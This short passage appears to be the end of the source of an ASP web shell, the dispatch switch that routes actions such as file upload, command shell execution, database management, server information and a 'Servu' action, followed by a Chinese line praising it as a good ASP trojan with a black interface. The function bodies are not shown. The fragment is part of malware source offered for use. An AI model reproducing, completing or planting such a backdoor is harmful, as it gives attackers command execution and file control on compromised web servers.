Case "NewFolder":Set ABC=New LBF:ABC.NewFolder(FName):Set ABC=Nothing
Case "UpFile":UpFile()
Case "Cmd1Shell":Cmd1Shell()
Case "Logout":Session.Contents.Remove("web2a2dmin"):Response.Redirect
URL
Case "DbManager":DbManager()
Case "Course":Course()
Case "ServerInfo":ServerInfo()
Case Else MainForm()
End Select
if Action<>"Servu" then ShowErr()
RRS"</body></html>"
%>
一款不错的asp木马,黑色界面